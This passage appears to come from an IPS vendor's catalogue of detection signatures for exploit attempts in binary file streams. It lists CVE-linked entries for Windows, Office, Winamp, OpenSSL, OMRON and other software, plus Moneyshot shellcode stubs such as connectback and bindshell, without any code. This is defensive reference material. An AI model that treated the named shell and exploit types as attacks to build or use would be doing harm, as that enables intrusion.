First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1101-5242
Vulnerability: Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475
Description:
Back to top

File-Binary_Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-09, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1775-5242
Last changed: sgpkg-ips-1778-5242
Vulnerability: Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217
Description:
Back to top

File-Binary_Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-02, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825
Description:
Back to top

File-Binary_Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-02, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows Server
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2011-12, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402
Description:
Back to top

File-Binary_Microsoft-Windows-Uniscribe-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2016-12, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: Microsoft-Windows-Uniscribe-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2009-11, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-WMF-File-Parsing-DOS

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Windows-WMF-File-Parsing-DOS
Description:
Back to top

File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution

About this situation: Detects malicious WMF files being downloaded from HTTP servers
Context: Other Binary File Stream
Severity: 10
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution-2

About this situation: Detects malicious Metasploit-made WMF files being downloaded from HTTP servers
Context: Other Binary File Stream
Severity: 10
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Word-For-Macintosh-Version-5-Document

About this situation: Detected Microsoft Word for Macintosh version 5 document
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word, Microsoft Office, MS2007-10, CVE2007, Windows not specific, Microsoft Word not specific, Microsoft Office not specific, Potential Compromise, Miscellaneous File, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Word-Malformed-String-Memory-Corruption
File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, CVE2021, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write
Description:
Back to top

File-Binary_Microsoft-Word-Legacy-Document

About this situation: Microsoft Word legacy document download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2004-09, CVE2004, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1395-5242
Last changed: sgpkg-ips-1395-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487
Description:
Back to top

File-Binary_Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1159-5242
Vulnerability: Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758
Description:
Back to top

File-Binary_Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1159-5242
Vulnerability: Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903
Description:
Back to top

File-Binary_Moneyshot-Shellcode-Arm-Linux-Execve

About this situation: Moneyshot arm/linux/execve shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-Arm-Linux-Fdreuse

About this situation: Moneyshot arm/linux/fdreuse shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-Arm-NDS-Redscreen

About this situation: Moneyshot arm/nds/redscreen shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-64-Linux-Connectback

About this situation: Moneyshot x86_64/linux/connectback shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-64-Linux-Shutdown

About this situation: Moneyshot x86_64/linux/shutdown shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-BSD-Binsh

About this situation: Moneyshot x86/bsd/binsh shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Bindshell

About this situation: Moneyshot x86/linux/bindshell shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Binsh

About this situation: Moneyshot x86/linux/binsh shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Connectback

About this situation: Moneyshot x86/linux/connectback shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Dup2

About this situation: Moneyshot x86/linux/dup2 shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Exec

About this situation: Moneyshot x86/linux/exec shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Fdreuse

About this situation: Moneyshot x86/linux/fdreuse shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Forkbomb

About this situation: Moneyshot x86/linux/forkbomb shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Linux-Write

About this situation: Moneyshot x86/linux/write shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Moneyshot-Shellcode-x86-Win32-Msgbox

About this situation: Moneyshot x86/win32/msgbox shellcode stub detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
Description:
Back to top

File-Binary_Mp3-Download

About this situation: Detected a download of MP3 audio file
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Streaming Protocols, Media File
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-449-4219
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_MPlayer-TwinVQ-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MPlayer detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MPlayer, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: MPlayer-TwinVQ-File-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_MS-Windows-Embedded-OpenType-Font-Engine-Lzcomp-IOF

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-01, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Microsoft-Windows-Embedded-OpenType-Font-Engine-Lzcomp-Integer-Overflow
Description:
Back to top

File-Binary_MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159

About this situation: A vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-05, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-451-4333
Vulnerability: MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159
Description:
Back to top

File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324

About this situation: A vulnerability in Microsoft Word
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2013-11, CVE2013, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324
Description:
Back to top

File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1325

About this situation: A vulnerability in Microsoft Word
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2013-11, CVE2013, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324
Description:
Back to top

File-Binary_Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption
Description:
Back to top

File-Binary_Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Realplayer detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, Helix Player, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service
Description:
Back to top

File-Binary_Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in libwpd Project WordPerfect Document Importer/Exporter (libwpd) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libwpd Project WordPerfect Document Importer/Exporter (libwpd), AbiSource AbiWord, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
Description:
Back to top

File-Binary_Nipper-Buffer-Overflow-CVE-2019-17424

About this situation: An attempt to exploit a vulnerability in nipper-ng detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, nipper-ng, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Nipper-Buffer-Overflow-CVE-2019-17424
Description:
Back to top

File-Binary_Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-422-4219
Last changed: sgpkg-ips-475-5211
Vulnerability: Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow
Description:
Back to top

File-Binary_Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
Description:
Back to top

File-Binary_Nullsoft-Winamp-MIDI-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Nullsoft-Winamp-MIDI-File-Buffer-Overflow
Description:
Back to top

File-Binary_Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Nullsoft Winamp detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF

About this situation: An attempt to exploit a vulnerability in Nullsoft Winamp detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-595-5211
Vulnerability: Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion

About this situation: An attempt to exploit a vulnerability in OMRON CX-One CX-Protocol detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1165-5242
Vulnerability: Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion
Description:
Back to top

File-Binary_Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion

About this situation: An attempt to exploit a vulnerability in OMRON CX-One CX-Protocol detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1172-5242
Vulnerability: Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion
Description:
Back to top

File-Binary_Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion

About this situation: An attempt to exploit a vulnerability in OMRON CX-One CX-Protocol detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1165-5242
Vulnerability: Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion
Description:
Back to top

File-Binary_Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Binary_OneNote-Document

About this situation: Detected transfer of OneNote file
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information, Document
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-760-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow

About this situation: Malicious EMF file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1689-5242
Vulnerability: OpenOffice-EMF-File-EMR_BITBLT-Record-Integer-Overflow
Description:
Back to top

File-Binary_OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenOffice.org detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1689-5242
Vulnerability: OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
Description:
Back to top

File-Binary_OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
Description:
Back to top

File-Binary_OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
Description:
Back to top

File-Binary_OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service
Description:
Back to top

File-Binary_Oracle-BI-Biremotingservlet-Amf-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization
